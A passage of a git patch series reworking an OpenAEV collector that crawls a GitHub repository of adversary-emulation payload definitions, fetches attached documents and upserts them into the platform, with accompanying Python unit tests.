"openaev_import_only_native" - ) - # unsure if the prefix needs to be refreshed to follow hot changes in the configuration - self.openaev_url_prefix = self._configuration.get("openaev_url_prefix") - # TODO cookie-less session + retry mechanism + url builder using urllib.urlparse - response = self.session.get(url=self.openaev_url_prefix + "manifest.json") - payloads = response.json() payload_external_ids = [] + payloads = self.github_crawler.get_json_file_paths() - for payload in payloads: - # Only native, continue - if openaev_import_only_native and ( - "native_collection" not in payload or not payload["native_collection"] - ): - continue - - payload_external_id = self._process_single_payload(payload) - payload_external_ids.append(payload_external_id) + for payload_path in payloads: + payload_external_id = self._process_single_payload(payload_path) + if payload_external_id: + payload_external_ids.append(payload_external_id) self.api.payload.deprecate( { diff --git a/openaev/tests/test_github_crawler.py b/openaev/tests/test_github_crawler.py index b360c6a0..5c6f56be 100644 --- a/openaev/tests/test_github_crawler.py +++ b/openaev/tests/test_github_crawler.py @@ -27,9 +27,14 @@ def test_github_crawler_init(self, m_github): self.assertEqual(crawler.ref_value, sentinel.ref_value) self.assertEqual(crawler.github_client, m_github.return_value) self.assertEqual(crawler.repo, m_github.return_value.get_repo.return_value) - self.assertEqual(crawler.ref, m_github.return_value.get_repo.return_value.get_git_ref.return_value) + self.assertEqual( + crawler.ref, + m_github.return_value.get_repo.return_value.get_git_ref.return_value, + ) m_github.return_value.get_repo.assert_called_with(sentinel.repo_name) - m_github.return_value.get_repo.return_value.get_git_ref.assert_called_with(sentinel.ref_value) + m_github.return_value.get_repo.return_value.get_git_ref.assert_called_with( + sentinel.ref_value + ) @patch.object(module, "requests") def test_get_json_file_paths(self, m_requests, m_github): @@ -38,7 +43,9 @@ def test_get_json_file_paths(self, m_requests, m_github): m_github.return_value.get_repo.return_value.trees_url = ( "https://dead/beef{/sha}" ) - m_github.return_value.get_repo.return_value.get_git_ref.return_value.object.sha = "feedc0de" + m_github.return_value.get_repo.return_value.get_git_ref.return_value.object.sha = ( + "feedc0de" + ) m_requests.get.return_value.json.return_value = { "tree": [ {"path": "manifest.json"}, diff --git a/openaev/tests/test_openaev_openaev.py b/openaev/tests/test_openaev_openaev.py index 8ef13780..edf860f8 100644 --- a/openaev/tests/test_openaev_openaev.py +++ b/openaev/tests/test_openaev_openaev.py @@ -10,8 +10,9 @@ } +@patch.object(module, "GithubCrawler") class TestOpenAEVOpenAEV(unittest.TestCase): - def test_openaev_collector_init(self): + def test_openaev_collector_init(self, m_githubcrawler): _configuration = daemon_config_data collector = module.OpenAEVOpenAEV(_configuration) @@ -20,8 +21,10 @@ def test_openaev_collector_init(self): self.assertEqual( collector.openaev_url_prefix, daemon_config_data["openaev_url_prefix"] ) + m_githubcrawler.assert_called_with("OpenAEV-Platform/payloads", "heads/main") + self.assertEqual(collector.github_crawler, m_githubcrawler.return_value) - def test_openaev_collector_create_or_get_tag(self): + def test_openaev_collector_create_or_get_tag(self, m_githubcrawler): api = MagicMock() api.tag.upsert.return_value = { "tag_id": sentinel.tag_id, @@ -57,7 +60,9 @@ def test_openaev_collector_create_or_get_tag(self): self.assertIsNone(tag_id) @patch.object(module.OpenAEVOpenAEV, "_create_or_get_tag") - def test_openaev_collector_process_payload_tags(self, m_create_or_get_tag): + def test_openaev_collector_process_payload_tags( + self, m_create_or_get_tag, m_githubcrawler + ): _configuration = daemon_config_data api = MagicMock() api.tag.upsert.side_effect = [ @@ -118,7 +123,7 @@ def test_openaev_collector_process_payload_tags(self, m_create_or_get_tag): ], ) - def test_openaev_collector_process_payload_attack_patterns(self): + def test_openaev_collector_process_payload_attack_patterns(self, m_githubcrawler): _configuration = daemon_config_data api = MagicMock() @@ -143,12 +148,16 @@ def test_openaev_collector_process_payload_attack_patterns(self): ) self.assertEqual(attack_patterns, ["foobar"]) + @patch.object(module.mimetypes, "guess_type") @patch.object(module.zipfile, "ZipFile") @patch.object(module.io, "BytesIO") - def test_openaev_collector_process_documents(self, m_bytesio, m_zipfile): + def test_openaev_collector_process_document( + self, m_bytesio, m_zipfile, m_guess_type, m_githubcrawler + ): _configuration = daemon_config_data api = MagicMock() session = MagicMock() + m_guess_type.return_value = "application/pdf", None collector = module.OpenAEVOpenAEV(_configuration) collector.api = api @@ -161,6 +170,7 @@ def test_openaev_collector_process_documents(self, m_bytesio, m_zipfile): "type": "documents", "document_tags": [{"tag_id": "tag1"}], "document_name": "path.file", + "document_path": "malware/malicious/evil/legit_document.docx", } } tags_mapping = {"tag1": {"key": "value"}} @@ -169,7 +179,25 @@ def test_openaev_collector_process_documents(self, m_bytesio, m_zipfile): payload, document_key, tags_mapping ) - def test_openaev_collector_is_valid_json_api(self): + self.assertIsNone(payload_document.get("id")) + self.assertIsNone(payload_document.get("type")) + self.assertEqual(payload_document["document_tags"], [{"key": "value"}]) + session.get.assert_called_with( + collector.openaev_url_prefix + "malware/malicious/evil/legit_document.docx" + ) + session.get.return_value.raise_for_status.assert_called_once() + m_bytesio.assert_any_call(session.get.return_value.content) + m_guess_type.assert_called_with("path.file") + api.document.upsert.assert_called_with( + document=payload_document, + file=( + "path.file", + m_bytesio.return_value, + "application/pdf", + ), + ) + + def test_openaev_collector_is_valid_json_api(self, m_githubcrawler): _configuration = daemon_config_data collector = module.OpenAEVOpenAEV(_configuration) @@ -179,7 +207,7 @@ def test_openaev_collector_is_valid_json_api(self): flag = collector._is_valid_json_api({"payload_information": None}) self.assertFalse(flag) - def test_openaev_collector_is_valid_json_flat(self): + def test_openaev_collector_is_valid_json_flat(self, m_githubcrawler): _configuration = daemon_config_data collector = module.OpenAEVOpenAEV(_configuration) @@ -189,25 +217,200 @@ def test_openaev_collector_is_valid_json_flat(self): flag = collector._is_valid_json_flat({"data": None}) self.assertFalse(flag) - def test_openaev_collector_process_jsonapi_payload(self): - pass + @patch.object(module.OpenAEVOpenAEV, "_process_document") + @patch.object(module.OpenAEVOpenAEV, "_process_payload_attack_patterns") + @patch.object(module.OpenAEVOpenAEV, "_process_payload_tags") + @patch.object(module, "json_api_doc") + def test_openaev_collector_process_jsonapi_payload( + self, + m_json_api_doc, + m_process_payload_tags, + m_process_payload_attack_patterns, + m_process_document, + m_githubcrawler, + ): + _configuration = daemon_config_data + api = MagicMock() + payload = MagicMock() + flat_payload = { + "id": "json api id", + "type": "payloads", + "payload_id": "payload id", + "payload_name": "payload name", + "dropper": {"type": "documents"}, + "payload_domains": [ + { + "domain_name": "domain name", + "domain_color": "domain color", + "type": "domains", + "id": "domain id", + } + ], + } + m_json_api_doc.deserialize.return_value = flat_payload + tags_mapping = MagicMock() + new_tags = MagicMock() + m_process_payload_tags.return_value = tags_mapping, new_tags + payload_document = MagicMock() + new_document = MagicMock() + m_process_document.return_value = payload_document, new_document + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + + external_id = collector._process_jsonapi_payload(payload) + + m_json_api_doc.deserialize.assert_called_with(payload) + m_process_payload_tags.assert_called_with(flat_payload) + self.assertEqual(flat_payload["payload_tags"], new_tags) + m_process_payload_attack_patterns.assert_called_with(flat_payload) + self.assertEqual( + flat_payload["payload_attack_patterns"], + m_process_payload_attack_patterns.return_value, + ) + m_process_document.assert_called_with(flat_payload, "dropper", tags_mapping) + self.assertIsNone(flat_payload.get("dropper")) + self.assertEqual(flat_payload["payload_document"], payload_document) + self.assertEqual( + flat_payload["payload_domains"], + [{"domain_name": "domain name", "domain_color": "domain color"}], + ) + self.assertIsNone(flat_payload.get("id")) + self.assertIsNone(flat_payload.get("type")) + self.assertIsNone(flat_payload.get("payload_id")) + self.assertEqual( + flat_payload["payload_collector"], + collector._configuration.get("collector_id"), + ) + api.payload.upsert.assert_called_with(flat_payload) + self.assertEqual(external_id, "payload id") + + @patch.object(module.OpenAEVOpenAEV, "_process_document") + @patch.object(module.OpenAEVOpenAEV, "_process_payload_attack_patterns") + @patch.object(module.OpenAEVOpenAEV, "_process_payload_tags") + def test_openaev_collector_process_jsonflat_payload( + self, + m_process_payload_tags, + m_process_payload_attack_patterns, + m_process_document, + m_githubcrawler, + ): + payload_information = { + "payload_external_id": "payload external id", + "payload_name": "payload name", + } + payload = { + "payload_information": payload_information, + } + _configuration = daemon_config_data + api = MagicMock() + tags_mapping = MagicMock() + new_tags = MagicMock() + m_process_payload_tags.return_value = tags_mapping, new_tags + payload_document = MagicMock() + new_document = MagicMock() + m_process_document.return_value = payload_document, new_document + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api + + external_id = collector._process_jsonflat_payload(payload) - def test_openaev_collector_process_jsonflat_payload(self): - pass + m_process_payload_tags.assert_called_with(payload) + self.assertEqual(payload_information["payload_tags"], new_tags) + m_process_payload_attack_patterns.assert_called_with(payload) + self.assertEqual( + payload_information["payload_attack_patterns"], + m_process_payload_attack_patterns.return_value, + ) + m_process_document.assert_called_with(payload, "payload_document", tags_mapping) + self.assertEqual( + payload_information["payload_collector"], + collector._configuration.get("collector_id"), + ) + api.payload.upsert.assert_called_with(payload_information) + self.assertEqual(external_id, "payload external id") + @patch.object(module.OpenAEVOpenAEV, "_process_jsonflat_payload") + @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_flat") @patch.object(module.OpenAEVOpenAEV, "_process_jsonapi_payload") @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_api") def test_openaev_collector_process_single_payload_jsonapi_case( - self, m_is_valid_json_api, m_process_jsonapi_payload + self, + m_is_valid_json_api, + m_process_jsonapi_payload, + m_is_valid_json_flat, + m_process_jsonflat_payload, + m_githubcrawler, ): - pass + _configuration = daemon_config_data + m_is_valid_json_api.return_value = True + + collector = module.OpenAEVOpenAEV(_configuration) + + payload_path = sentinel.payload_path + _payload = MagicMock + m_githubcrawler.return_value.get_json.return_value = _payload + + data = collector._process_single_payload(payload_path) + + m_githubcrawler.return_value.get_json.assert_called_with(sentinel.payload_path) + m_is_valid_json_api.assert_called_with(_payload) + m_process_jsonapi_payload.assert_called_with(_payload) + m_is_valid_json_flat.assert_not_called() + m_process_jsonflat_payload.assert_not_called() + self.assertEqual(data, m_process_jsonapi_payload.return_value) @patch.object(module.OpenAEVOpenAEV, "_process_jsonflat_payload") @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_flat") + @patch.object(module.OpenAEVOpenAEV, "_process_jsonapi_payload") + @patch.object(module.OpenAEVOpenAEV, "_is_valid_json_api") def test_openaev_collector_process_single_payload_jsonflat_case( - self, m_is_valid_json_flat, m_process_jsonflat_payload + self, + m_is_valid_json_api, + m_process_jsonapi_payload, + m_is_valid_json_flat, + m_process_jsonflat_payload, + m_githubcrawler, + ): + _configuration = daemon_config_data + m_is_valid_json_api.return_value = False + m_is_valid_json_flat.return_value = True + + collector = module.OpenAEVOpenAEV(_configuration) + + payload_path = sentinel.payload_path + _payload = MagicMock + m_githubcrawler.return_value.get_json.return_value = _payload + + data = collector._process_single_payload(payload_path) + + m_githubcrawler.return_value.get_json.assert_called_with(sentinel.payload_path) + m_is_valid_json_api.assert_called_with(_payload) + m_process_jsonapi_payload.assert_not_called() + m_is_valid_json_flat.assert_called_with(_payload) + m_process_jsonflat_payload.assert_called_with(_payload) + self.assertEqual(data, m_process_jsonflat_payload.return_value) + + @patch.object(module.OpenAEVOpenAEV, "_process_single_payload") + def test_openaev_collector_process_message( + self, m_process_single_payload, m_githubcrawler ): - pass + _configuration = daemon_config_data + payload_path = sentinel.payload_path + m_githubcrawler.return_value.get_json_file_paths.return_value = [payload_path] + api = MagicMock() + + collector = module.OpenAEVOpenAEV(_configuration) + collector.api = api - def test_openaev_collector_process_message(self): - pass + collector._process_message() + + m_githubcrawler.return_value.get_json_file_paths.assert_called_once() + m_process_single_payload.assert_called_with(payload_path) + api.payload.deprecate.assert_called_with( + { + "collector_id": collector._configuration.get("collector_id"), + "payload_external_ids": [m_process_single_payload.return_value], + } + ) From 24f8ce3e96aca0d02425ccc997365403182cc0ec Mon Sep 17 00:00:00 2001 From: guzmud Date: Thu, 21 May 2026 12:04:09 +0200 Subject: [PATCH 07/13] [openaev] feat(githubcrawler): switch from attachment filepaths to raw download --- openaev/openaev/github_crawler.py | 33 ++++++++--------- openaev/tests/test_github_crawler.py | 54 ++++++++++++---------------- 2 files changed, 38 insertions(+), 49 deletions(-) diff --git a/openaev/openaev/github_crawler.py b/openaev/openaev/github_crawler.py index 1492d051..141b9f8b 100644 --- a/openaev/openaev/github_crawler.py +++ b/openaev/openaev/github_crawler.py @@ -1,5 +1,4 @@ -from base64 import b64decode -from urllib.parse import urlparse +from urllib.parse import quote, urlparse import orjson import requests @@ -41,21 +40,19 @@ def get_json_file_paths(self): def get_json(self, json_file_path): content = self.repo.get_contents(json_file_path) - data = orjson.loads(b64decode(content.content)) + data = content.decoded_content + data = orjson.loads(data) return data - def get_attachment_filepaths(self, json_file_path): - parent_path = "/".join(json_file_path.rsplit("/")[:-1]) - folder_content = self.repo.get_contents(parent_path) - attachment_filepaths = [ - contentfile.path - for contentfile in folder_content - if contentfile.path != json_file_path - ] - return attachment_filepaths - - def get_attachment_download_url(self, attachment_filepath): - content = self.repo.get_contents(attachment_filepath) - # content.url for API url - # content.content for the actual data - return content.download_url + def get_filepath_if_exists(self, folderpath, filename): + """check if a specific file exists in a specific folder""" + filepath = f"{folderpath.rstrip('/')}/{filename.lstrip('/')}" + if filepath in [el.path for el in self.repo.get_contents(folderpath)]: + return filepath + return + + def gen_raw_download_url(self, path): + """return the raw download URL for a specific path""" + path = quote(path) + url = f"https://raw.githubusercontent.com/{self.repo_name}/{self.ref_value}/{path}" + return url diff --git a/openaev/tests/test_github_crawler.py b/openaev/tests/test_github_crawler.py index 5c6f56be..92766899 100644 --- a/openaev/tests/test_github_crawler.py +++ b/openaev/tests/test_github_crawler.py @@ -62,9 +62,8 @@ def test_get_json_file_paths(self, m_requests, m_github): m_requests.get.assert_called_with("https://dead/beef/feedc0de?recursive=true") self.assertEqual(json_file_paths, ["malware/malicious/evil/payload.json"]) - @patch.object(module, "b64decode") @patch.object(module, "orjson") - def test_get_json(self, m_orjson, m_b64decode, m_github): + def test_get_json(self, m_orjson, m_github): repo_name = sentinel.repo_name ref_value = sentinel.ref_value content = MagicMock() @@ -79,48 +78,41 @@ def test_get_json(self, m_orjson, m_b64decode, m_github): m_github.return_value.get_repo.return_value.get_contents.assert_called_with( "malware/malicious/evil/payload.json" ) - m_b64decode.assert_called_with(content.content) - m_orjson.loads.assert_called_with(m_b64decode.return_value) + m_orjson.loads.assert_called_with(content.decoded_content) self.assertEqual(data, m_orjson.loads.return_value) - def test_get_attachment_filepaths(self, m_github): + def test_get_filepath_if_exists(self, m_github): repo_name = sentinel.repo_name ref_value = sentinel.ref_value - contentfile1 = MagicMock() - contentfile1.path = "malware/malicious/evil/payload.json" - contentfile2 = MagicMock() - contentfile2.path = "malware/malicious/evil/legit_document.docx" + content1 = MagicMock(path="malware/malicious/evil/payload.json") + content2 = MagicMock(path="malware/malicious/evil/legit.docx") m_github.return_value.get_repo.return_value.get_contents.return_value = [ - contentfile1, - contentfile2, + content1, content2, ] crawler = module.GithubCrawler(repo_name, ref_value) - json_file_path = "malware/malicious/evil/payload.json" + folderpath = "malware/malicious/evil" + filename = "payload.json" - attachment_filepaths = crawler.get_attachment_filepaths(json_file_path) + filepath = crawler.get_filepath_if_exists(folderpath, filename) - m_github.return_value.get_repo.return_value.get_contents.assert_called_with( - "malware/malicious/evil" - ) - self.assertEqual( - attachment_filepaths, ["malware/malicious/evil/legit_document.docx"] - ) + self.assertEqual(filepath, "malware/malicious/evil/payload.json") - def test_get_attachment_download_url(self, m_github): - repo_name = sentinel.repo_name - ref_value = sentinel.ref_value - content = MagicMock() - content.download_url = sentinel.download_url - m_github.return_value.get_repo.return_value.get_contents.return_value = content + filename = "wrong_filename.json" + + filepath = crawler.get_filepath_if_exists(folderpath, filename) + + self.assertIsNone(filepath) + + def test_gen_raw_download_url(self, m_github): + repo_name = "repo/name" + ref_value = "heads/main" crawler = module.GithubCrawler(repo_name, ref_value) - attachment_filepath = "malware/malicious/evil/legit_document.docx" - download_url = crawler.get_attachment_download_url(attachment_filepath) + path = "malware/malicious/evil/payload.json" - m_github.return_value.get_repo.return_value.get_contents.assert_called_with( - attachment_filepath - ) - self.assertEqual(download_url, sentinel.download_url) + raw_url = crawler.gen_raw_download_url(path) + + self.assertEqual(raw_url, "https://raw.githubusercontent.com/repo/name/heads/main/malware/malicious/evil/payload.json") From 8abb82a39b7e272b7cb2b60c51c3ef1b704e32dd Mon Sep 17 00:00:00 2001 From: guzmud Date: Thu, 21 May 2026 12:15:54 +0200 Subject: [PATCH 08/13] [openaev] feat(collector): process_document compatible with both formats --- openaev/openaev/openaev_openaev.py | 94 +++++++++++++++++---------- openaev/tests/test_github_crawler.py | 8 ++- openaev/tests/test_openaev_openaev.py | 20 ++++-- 3 files changed, 78 insertions(+), 44 deletions(-) diff --git a/openaev/openaev/openaev_openaev.py b/openaev/openaev/openaev_openaev.py index fbc30d96..6f32e096 100644 --- a/openaev/openaev/openaev_openaev.py +++ b/openaev/openaev/openaev_openaev.py @@ -26,6 +26,8 @@ def __init__( repo_name, ref_value = extract_from_url_prefix(self.openaev_url_prefix) self.github_crawler = GithubCrawler(repo_name, ref_value) + self.current_payload_path = None + def _create_or_get_tag(self, tag_name, tag_color="#6b7280"): """Create or get a tag and return its ID.""" try: @@ -87,7 +89,6 @@ def _process_payload_attack_patterns(self, payload): return attack_patterns def _process_document(self, payload, document_key, tags_mapping): - new_document = None payload_document = payload.get(document_key, {}) if "id" in payload_document: @@ -102,41 +103,63 @@ def _process_document(self, payload, document_key, tags_mapping): tag["tag_id"] for tag in payload_document.get("document_tags", []) ] - if payload_document.get("document_path", ""): - # Upload the document - payload_document["document_tags"] = [ - tags_mapping[tag_id] - for tag_id in payload_document.get("document_tags", []) - if tag_id in tags_mapping - ] - - # TODO use url builder from urllib.parse - zip_url = self.openaev_url_prefix + payload_document["document_path"] - zip_response = self.session.get(zip_url) + if not payload_document.get("document_path", "") and payload_document.get( + "document_target" + ): + folderpath = self.current_payload_path.rsplit("/", 1)[0] + filename = payload_document.get("document_target") + filepath = self.github_crawler.get_filepath_if_exists(folderpath, filename) + if filepath: + payload_document["document_path"] = filepath + else: + self.logger.warning( + f"Failed to find document {filename} for payload {self.current_payload_path}" + ) + + if not payload_document.get("document_name", "") and payload_document.get( + "document_target" + ): + payload_document["document_name"] = payload_document["document_target"] + + if not payload_document.get("document_path", ""): + return payload_document, None + + # Upload the document + payload_document["document_tags"] = [ + tags_mapping[tag_id] + for tag_id in payload_document.get("document_tags", []) + if tag_id in tags_mapping + ] + + url = self.github_crawler.gen_raw_download_url( + payload_document["document_path"] + ) + if payload_document["document_path"].endswith(".zip"): + target = payload_document["document_target"] + zip_response = self.session.get(url) zip_response.raise_for_status() - # could using ziphyr be more efficient here? with io.BytesIO(zip_response.content) as zip_buffer: with zipfile.ZipFile(zip_buffer) as z: - file_names = z.namelist() - if not file_names: - raise Exception(f"No file found in zip at {zip_url}") - file_name = file_names[0] - with z.open(file_name, pwd=b"infected") as unzipped_file: + if not target in z.namelist(): + raise Exception(f"No {target} file found in zip at {url}") + with z.open(target, pwd=b"infected") as unzipped_file: file_content = unzipped_file.read() - mime_type, _ = mimetypes.guess_type( - payload_document["document_name"] - ) - if mime_type is None: - mime_type = "application/octet-stream" - file_handle = io.BytesIO(file_content) - file = ( - payload_document["document_name"], - file_handle, - mime_type, - ) - new_document = self.api.document.upsert( - document=payload_document, file=file - ) + else: + file_response = self.session.get(url) + file_response.raise_for_status() + file_content = file_response.content + + mime_type, _ = mimetypes.guess_type(payload_document["document_name"]) + mime_type = mime_type or "application/octet_stream" + with io.BytesIO(file_content) as file_handle: + file = ( + payload_document["document_name"], + file_handle, + mime_type, + ) + new_document = self.api.document.upsert( + document=payload_document, file=file + ) return payload_document, new_document @@ -254,8 +277,8 @@ def _process_jsonflat_payload(self, payload): return payload_information["payload_external_id"] - def _process_single_payload(self, payload_path): - payload = self.github_crawler.get_json(payload_path) + def _process_single_payload(self): + payload = self.github_crawler.get_json(self.current_payload_path) openaev_import_only_native = self._configuration.get( "openaev_import_only_native" @@ -279,7 +302,8 @@ def _process_message(self) -> None: payloads = self.github_crawler.get_json_file_paths() for payload_path in payloads: - payload_external_id = self._process_single_payload(payload_path) + self.current_payload_path = payload_path + payload_external_id = self._process_single_payload() if payload_external_id: payload_external_ids.append(payload_external_id) diff --git a/openaev/tests/test_github_crawler.py b/openaev/tests/test_github_crawler.py index 92766899..942a72be 100644 --- a/openaev/tests/test_github_crawler.py +++ b/openaev/tests/test_github_crawler.py @@ -87,7 +87,8 @@ def test_get_filepath_if_exists(self, m_github): content1 = MagicMock(path="malware/malicious/evil/payload.json") content2 = MagicMock(path="malware/malicious/evil/legit.docx") m_github.return_value.get_repo.return_value.get_contents.return_value = [ - content1, content2, + content1, + content2, ] crawler = module.GithubCrawler(repo_name, ref_value) @@ -115,4 +116,7 @@ def test_gen_raw_download_url(self, m_github): raw_url = crawler.gen_raw_download_url(path) - self.assertEqual(raw_url, "https://raw.githubusercontent.com/repo/name/heads/main/malware/malicious/evil/payload.json") + self.assertEqual( + raw_url, + "https://raw.githubusercontent.com/repo/name/heads/main/malware/malicious/evil/payload.json", + ) diff --git a/openaev/tests/test_openaev_openaev.py b/openaev/tests/test_openaev_openaev.py index edf860f8..acff2bc0 100644 --- a/openaev/tests/test_openaev_openaev.py +++ b/openaev/tests/test_openaev_openaev.py @@ -23,6 +23,7 @@ def test_openaev_collector_init(self, m_githubcrawler): ) m_githubcrawler.assert_called_with("OpenAEV-Platform/payloads", "heads/main") self.assertEqual(collector.github_crawler, m_githubcrawler.return_value) + self.assertIsNone(collector.current_payload_path) def test_openaev_collector_create_or_get_tag(self, m_githubcrawler): api = MagicMock() @@ -182,8 +183,12 @@ def test_openaev_collector_process_document( self.assertIsNone(payload_document.get("id")) self.assertIsNone(payload_document.get("type")) self.assertEqual(payload_document["document_tags"], [{"key": "value"}]) + m_githubcrawler.return_value.get_filepath_if_exists.assert_not_called() + m_githubcrawler.return_value.gen_raw_download_url.assert_called_with( + "malware/malicious/evil/legit_document.docx" + ) session.get.assert_called_with( - collector.openaev_url_prefix + "malware/malicious/evil/legit_document.docx" + m_githubcrawler.return_value.gen_raw_download_url.return_value ) session.get.return_value.raise_for_status.assert_called_once() m_bytesio.assert_any_call(session.get.return_value.content) @@ -192,7 +197,7 @@ def test_openaev_collector_process_document( document=payload_document, file=( "path.file", - m_bytesio.return_value, + m_bytesio.return_value.__enter__.return_value, "application/pdf", ), ) @@ -348,11 +353,11 @@ def test_openaev_collector_process_single_payload_jsonapi_case( collector = module.OpenAEVOpenAEV(_configuration) - payload_path = sentinel.payload_path + collector.current_payload_path = sentinel.payload_path _payload = MagicMock m_githubcrawler.return_value.get_json.return_value = _payload - data = collector._process_single_payload(payload_path) + data = collector._process_single_payload() m_githubcrawler.return_value.get_json.assert_called_with(sentinel.payload_path) m_is_valid_json_api.assert_called_with(_payload) @@ -379,11 +384,11 @@ def test_openaev_collector_process_single_payload_jsonflat_case( collector = module.OpenAEVOpenAEV(_configuration) - payload_path = sentinel.payload_path + collector.current_payload_path = sentinel.payload_path _payload = MagicMock m_githubcrawler.return_value.get_json.return_value = _payload - data = collector._process_single_payload(payload_path) + data = collector._process_single_payload() m_githubcrawler.return_value.get_json.assert_called_with(sentinel.payload_path) m_is_valid_json_api.assert_called_with(_payload) @@ -407,7 +412,8 @@ def test_openaev_collector_process_message( collector._process_message() m_githubcrawler.return_value.get_json_file_paths.assert_called_once() - m_process_single_payload.assert_called_with(payload_path) + m_process_single_payload.assert_called_once() + self.assertEqual(collector.current_payload_path, sentinel.payload_path) api.payload.deprecate.assert_called_with( { "collector_id": collector._configuration.get("collector_id"), From 58b7926738fc14ba6a76c3999fc7fbcf226289f8 Mon Sep 17 00:00:00 2001 From: guzmud Date: Thu, 21 May 2026 13:43:41 +0200 Subject: [PATCH 09/13] [openaev] fix(collector): moving payload data upsert outside of specialized functions --- openaev/openaev/github_crawler.py | 10 ++-- openaev/openaev/openaev_openaev.py | 59 ++++++++++----------- openaev/tests/test_openaev_openaev.py | 74 ++++++++++++++------------- 3 files changed, 70 insertions(+), 73 deletions(-) diff --git a/openaev/openaev/github_crawler.py b/openaev/openaev/github_crawler.py index 141b9f8b..5dd8a9d1 100644 --- a/openaev/openaev/github_crawler.py +++ b/openaev/openaev/github_crawler.py @@ -14,7 +14,7 @@ def extract_from_url_prefix(url_prefix): class GithubCrawler: - def __init__(self, repo_name, ref_value): + def __init__(self, repo_name: str, ref_value: str) -> None: self.repo_name = repo_name self.ref_value = ref_value @@ -22,7 +22,7 @@ def __init__(self, repo_name, ref_value): self.repo = self.github_client.get_repo(self.repo_name) self.ref = self.repo.get_git_ref(self.ref_value) - def get_json_file_paths(self): + def get_json_file_paths(self) -> list: tree_url = self.repo.trees_url tree_url = tree_url.replace("{/sha}", f"/{self.ref.object.sha}") tree_url += "?recursive=true" @@ -38,20 +38,20 @@ def get_json_file_paths(self): ] return json_file_paths - def get_json(self, json_file_path): + def get_json(self, json_file_path: str) -> dict: content = self.repo.get_contents(json_file_path) data = content.decoded_content data = orjson.loads(data) return data - def get_filepath_if_exists(self, folderpath, filename): + def get_filepath_if_exists(self, folderpath: str, filename: str) -> str | None: """check if a specific file exists in a specific folder""" filepath = f"{folderpath.rstrip('/')}/{filename.lstrip('/')}" if filepath in [el.path for el in self.repo.get_contents(folderpath)]: return filepath return - def gen_raw_download_url(self, path): + def gen_raw_download_url(self, path: str) -> str: """return the raw download URL for a specific path""" path = quote(path) url = f"https://raw.githubusercontent.com/{self.repo_name}/{self.ref_value}/{path}" diff --git a/openaev/openaev/openaev_openaev.py b/openaev/openaev/openaev_openaev.py index 6f32e096..198be803 100644 --- a/openaev/openaev/openaev_openaev.py +++ b/openaev/openaev/openaev_openaev.py @@ -15,7 +15,7 @@ class OpenAEVOpenAEV(CollectorDaemon): def __init__( self, configuration: Configuration, - ): + ) -> None: super().__init__( configuration=configuration, callback=self._process_message, @@ -28,7 +28,7 @@ def __init__( self.current_payload_path = None - def _create_or_get_tag(self, tag_name, tag_color="#6b7280"): + def _create_or_get_tag(self, tag_name: str, tag_color: str = "#6b7280"): """Create or get a tag and return its ID.""" try: tag_data = {"tag_name": tag_name, "tag_color": tag_color} @@ -38,7 +38,7 @@ def _create_or_get_tag(self, tag_name, tag_color="#6b7280"): self.logger.warning(f"Failed to upsert tag {tag_name}: {e}") return None - def _process_payload_tags(self, payload): + def _process_payload_tags(self, payload: dict): tags_mapping = {} payload_tags = payload.get("payload_tags", []) for tag in payload_tags: @@ -71,7 +71,7 @@ def _process_payload_tags(self, payload): return tags_mapping, new_tags - def _process_payload_attack_patterns(self, payload): + def _process_payload_attack_patterns(self, payload: dict) -> list: attack_patterns = payload.get("payload_attack_patterns", []) for idx in range(len(attack_patterns)): @@ -88,7 +88,7 @@ def _process_payload_attack_patterns(self, payload): ] return attack_patterns - def _process_document(self, payload, document_key, tags_mapping): + def _process_document(self, payload: dict, document_key: str, tags_mapping: dict): payload_document = payload.get(document_key, {}) if "id" in payload_document: @@ -163,15 +163,15 @@ def _process_document(self, payload, document_key, tags_mapping): return payload_document, new_document - def _is_valid_json_api(self, payload): + def _is_valid_json_api(self, payload: dict) -> bool: """check if the JSON data is in the JSON:API format""" return "data" in payload.keys() - def _is_valid_json_flat(self, payload): + def _is_valid_json_flat(self, payload: dict) -> bool: """check if the JSON data is in the legacy flat JSON payload format""" return "payload_information" in payload.keys() - def _process_jsonapi_payload(self, payload): + def _process_jsonapi_payload(self, payload: dict) -> dict: """processing a single JSON:API payload""" flat_payload = json_api_doc.deserialize(payload) self.logger.info("Importing payload " + flat_payload["payload_name"]) @@ -238,14 +238,9 @@ def _process_jsonapi_payload(self, payload): if key in flat_payload: del flat_payload[key] - # Upsert payload - flat_payload["payload_collector"] = self._configuration.get("collector_id") - self.api.payload.upsert(flat_payload) - self.logger.info("Payload " + flat_payload["payload_name"] + " imported") + return flat_payload - return flat_payload["payload_external_id"] - - def _process_jsonflat_payload(self, payload): + def _process_jsonflat_payload(self, payload: dict) -> dict: """processing a single legacy flat JSON payload""" payload_information = payload.get("payload_information") self.logger.info("Importing payload " + payload_information["payload_name"]) @@ -268,16 +263,9 @@ def _process_jsonflat_payload(self, payload): if key in payload_information and new_document is not None: payload_information[key] = new_document["document_id"] - # Upsert payload - payload_information["payload_collector"] = self._configuration.get( - "collector_id" - ) - self.api.payload.upsert(payload_information) - self.logger.info("Payload " + payload_information["payload_name"] + " imported") - - return payload_information["payload_external_id"] + return payload_information - def _process_single_payload(self): + def _process_single_payload(self) -> str | None: payload = self.github_crawler.get_json(self.current_payload_path) openaev_import_only_native = self._configuration.get( @@ -287,15 +275,22 @@ def _process_single_payload(self): "native_collection" not in payload or not payload["native_collection"] ): return + if self._is_valid_json_api(payload): # new format - return self._process_jsonapi_payload(payload) - if self._is_valid_json_flat(payload): # legacy format - return self._process_jsonflat_payload(payload) - - self.logger.warning( - "Skipping a payload that didn't match JSON:API format nor flat legacy format" - ) # should it be a logger.error / a raise Exception? - return + payload = self._process_jsonapi_payload(payload) + elif self._is_valid_json_flat(payload): # legacy format + payload = self._process_jsonflat_payload(payload) + else: + self.logger.warning( + f"Skipping a payload that didn't match JSON:API format nor flat legacy format: {self.current_payload_path}" + ) + return + + payload["payload_collector"] = self._configuration.get("collector_id") + self.api.payload.upsert(payload) + self.logger.info(f"Payload {payload["payload_name"]} imported") + + return payload["payload_external_id"] def _process_message(self) -> None: payload_external_ids = [] diff --git a/openaev/tests/test_openaev_openaev.py b/openaev/tests/test_openaev_openaev.py index acff2bc0..aa26454d 100644 --- a/openaev/tests/test_openaev_openaev.py +++ b/openaev/tests/test_openaev_openaev.py @@ -235,7 +235,6 